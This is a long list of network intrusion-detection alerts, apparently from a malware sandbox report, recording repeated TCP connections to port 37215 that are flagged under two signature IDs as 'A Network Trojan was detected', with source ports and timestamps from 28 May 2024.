            SID:2835222
            Source Port:50508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.958691
            SID:2835222
            Source Port:47652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431049
            SID:2835222
            Source Port:53456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956500
            SID:2829579
            Source Port:45572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061065
            SID:2835222
            Source Port:50788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988660
            SID:2829579
            Source Port:36342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298475
            SID:2829579
            Source Port:34026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765261
            SID:2829579
            Source Port:55684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871140
            SID:2829579
            Source Port:41402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730725
            SID:2835222
            Source Port:46026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.113396
            SID:2835222
            Source Port:36402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380180
            SID:2829579
            Source Port:35596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811903
            SID:2829579
            Source Port:51562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.897659
            SID:2829579
            Source Port:57308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766003
            SID:2829579
            Source Port:35992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261451
            SID:2829579
            Source Port:54838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541647
            SID:2835222
            Source Port:44038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574143
            SID:2829579
            Source Port:50264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840147
            SID:2835222
            Source Port:53452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773127
            SID:2835222
            Source Port:54210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278014
            SID:2835222
            Source Port:43488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343843
            SID:2829579
            Source Port:48358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878855
            SID:2835222
            Source Port:49372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773851
            SID:2829579
            Source Port:40786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776769
            SID:2835222
            Source Port:51028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855691
            SID:2835222
            Source Port:34092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304243
            SID:2829579
            Source Port:36850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987228
            SID:2829579
            Source Port:39788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996074
            SID:2829579
            Source Port:52336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012327
            SID:2835222
            Source Port:43690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869899
            SID:2829579
            Source Port:56812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587334
            SID:2835222
            Source Port:39536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993958
            SID:2829579
            Source Port:40418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299757
            SID:2829579
            Source Port:44978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400112
            SID:2829579
            Source Port:52788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.488002
            SID:2829579
            Source Port:43836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786510
            SID:2835222
            Source Port:53596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.579627
            SID:2835222
            Source Port:37358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.564058
            SID:2835222
            Source Port:39980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843189
            SID:2835222
            Source Port:35014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450452
            SID:2835222
            Source Port:40710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.822104
            SID:2829579
            Source Port:51682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713441
            SID:2835222
            Source Port:37442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746329
            SID:2829579
            Source Port:53010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400080
            SID:2835222
            Source Port:60850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277970
            SID:2835222
            Source Port:35058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913897
            SID:2835222
            Source Port:46608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723564
            SID:2835222
            Source Port:59280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771781
            SID:2835222
            Source Port:36402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810343
            SID:2829579
            Source Port:57252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.932040
            SID:2835222
            Source Port:34676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.386227
            SID:2835222
            Source Port:45668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.296593
            SID:2835222
            Source Port:52266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896206
            SID:2829579
            Source Port:37396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066433
            SID:2829579
            Source Port:59516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.113519
            SID:2829579
            Source Port:34410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760117
            SID:2829579
            Source Port:42102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564966
            SID:2829579
            Source Port:33934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332442
            SID:2835222
            Source Port:36708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955580
            SID:2829579
            Source Port:48190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985950
            SID:2835222
            Source Port:56530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002302
            SID:2835222
            Source Port:38256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444640
            SID:2829579
            Source Port:39142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002253
            SID:2835222
            Source Port:50602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.403402
            SID:2835222
            Source Port:48266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059719
            SID:2835222
            Source Port:44418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604681
            SID:2829579
            Source Port:49306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810157
            SID:2829579
            Source Port:54288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057979
            SID:2829579
            Source Port:34544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963026
            SID:2829579
            Source Port:35260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755772
            SID:2835222
            Source Port:47506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922246
            SID:2829579
            Source Port:53116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.829046
            SID:2829579
            Source Port:57182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815718
            SID:2829579
            Source Port:41004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687741
            SID:2835222
            Source Port:55250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321243
            SID:2829579
            Source Port:60944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508013
            SID:2835222
            Source Port:46638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062671
            SID:2829579
            Source Port:60424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277915
            SID:2835222
            Source Port:47102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317094
            SID:2835222
            Source Port:37716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771840
            SID:2829579
            Source Port:60340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004860
            SID:2835222
            Source Port:36218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714806
            SID:2835222
            Source Port:59742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062735
            SID:2829579
            Source Port:55780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957034
            SID:2829579
            Source Port:55750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047288
            SID:2829579
            Source Port:52540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687499
            SID:2829579
            Source Port:36678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.742258
            SID:2835222
            Source Port:47320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470684
            SID:2829579
            Source Port:33612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.948983
            SID:2829579
            Source Port:43738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382534
            SID:2835222
            Source Port:44560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871759
            SID:2835222
            Source Port:34728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723591
            SID:2835222
            Source Port:37792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063022
            SID:2835222
            Source Port:52714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852878
            SID:2835222
            Source Port:45134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713653
            SID:2835222
            Source Port:52984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807043
            SID:2829579
            Source Port:47258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.062041
            SID:2835222
            Source Port:46044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064666
            SID:2835222
            Source Port:47152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854502
            SID:2829579
            Source Port:58764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846957
            SID:2835222
            Source Port:49882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469532
            SID:2835222
            Source Port:59404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931956
            SID:2835222
            Source Port:42034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.006678
            SID:2829579
            Source Port:59814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919805
            SID:2829579
            Source Port:43212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701859
            SID:2835222
            Source Port:52076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067230
            SID:2835222
            Source Port:39544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555116
            SID:2829579
            Source Port:48272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.718020
            SID:2829579
            Source Port:51782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639829
            SID:2829579
            Source Port:46730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809183
            SID:2835222
            Source Port:40638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.847296
            SID:2829579
            Source Port:39712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825286
            SID:2835222
            Source Port:46258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459423
            SID:2835222
            Source Port:53200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302225
            SID:2835222
            Source Port:36406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.138272
            SID:2829579
            Source Port:56968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851013
            SID:2835222
            Source Port:40836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.010253
            SID:2835222
            Source Port:49060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.739038
            SID:2835222
            Source Port:43822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.517678
            SID:2835222
            Source Port:43812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905597
            SID:2829579
            Source Port:50954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714986
            SID:2835222
            Source Port:35118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871399
            SID:2829579
            Source Port:59004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722257
            SID:2829579
            Source Port:36672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919943
            SID:2835222
            Source Port:48638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925531
            SID:2835222
            Source Port:59032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919728
            SID:2835222
            Source Port:56558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444666
            SID:2835222
            Source Port:36282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051161
            SID:2835222
            Source Port:56526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031362
            SID:2835222
            Source Port:48956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862952
            SID:2835222
            Source Port:33188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261028
            SID:2829579
            Source Port:58726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505579
            SID:2835222
            Source Port:40332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658174
            SID:2829579
            Source Port:59906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995949
            SID:2835222
            Source Port:50188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909872
            SID:2829579
            Source Port:60332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261597
            SID:2829579
            Source Port:38102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058472
            SID:2835222
            Source Port:37576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917659
            SID:2835222
            Source Port:34200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881072
            SID:2829579
            Source Port:41214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934282
            SID:2829579
            Source Port:41660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917794
            SID:2829579
            Source Port:51500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766501
            SID:2835222
            Source Port:54964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999300
            SID:2829579
            Source Port:40688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.989249
            SID:2829579
            Source Port:55570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665753
            SID:2835222
            Source Port:50434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413102
            SID:2829579
            Source Port:36894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833806
            SID:2835222
            Source Port:35968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697283
            SID:2829579
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068603
            SID:2835222
            Source Port:56788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760417
            SID:2835222
            Source Port:60544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930218
            SID:2829579
            Source Port:32996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734152
            SID:2835222
            Source Port:49982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617665
            SID:2835222
            Source Port:41934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858824
            SID:2829579
            Source Port:47034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852842
            SID:2835222
            Source Port:42542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880796
            SID:2835222
            Source Port:46166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.943085
            SID:2829579
            Source Port:54980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809083
            SID:2835222
            Source Port:55128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453114
            SID:2835222
            Source Port:46922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.395958
            SID:2835222
            Source Port:40558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507340
            SID:2835222
            Source Port:49880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859415
            SID:2835222
            Source Port:60482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741623
            SID:2829579
            Source Port:52880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818347
            SID:2835222
            Source Port:43630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541873
            SID:2829579
            Source Port:55538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925107
            SID:2829579
            Source Port:44390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319638
            SID:2835222
            Source Port:51902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894041
            SID:2829579
            Source Port:44038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869441
            SID:2829579
            Source Port:48076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626710
            SID:2835222
            Source Port:49580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999376
            SID:2835222
            Source Port:40790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778438
            SID:2829579
            Source Port:52500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.607278
            SID:2835222
            Source Port:54782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757846
            SID:2829579
            Source Port:49640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818311
            SID:2835222
            Source Port:56632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565182
            SID:2835222
            Source Port:58452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929601
            SID:2835222
            Source Port:54764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948187
            SID:2835222
            Source Port:43438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308216
            SID:2835222
            Source Port:39062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469493
            SID:2835222
            Source Port:49268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793782
            SID:2829579
            Source Port:53130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682128
            SID:2835222
            Source Port:56490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065812
            SID:2835222
            Source Port:43458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412872
            SID:2829579
            Source Port:50944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.873112
            SID:2829579
            Source Port:55862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.919287
            SID:2829579
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.051787
            SID:2835222
            Source Port:49546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723868
            SID:2835222
            Source Port:45974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222008
            SID:2829579
            Source Port:48272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.326207
            SID:2829579
            Source Port:41324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944201
            SID:2829579
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261482
            SID:2835222
            Source Port:51638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669486
            SID:2835222
            Source Port:55220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047082
            SID:2829579
            Source Port:45682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.341806
            SID:2829579
            Source Port:47340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323370
            SID:2835222
            Source Port:33688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.929729
            SID:2835222
            Source Port:49238
            Destination Port:37215
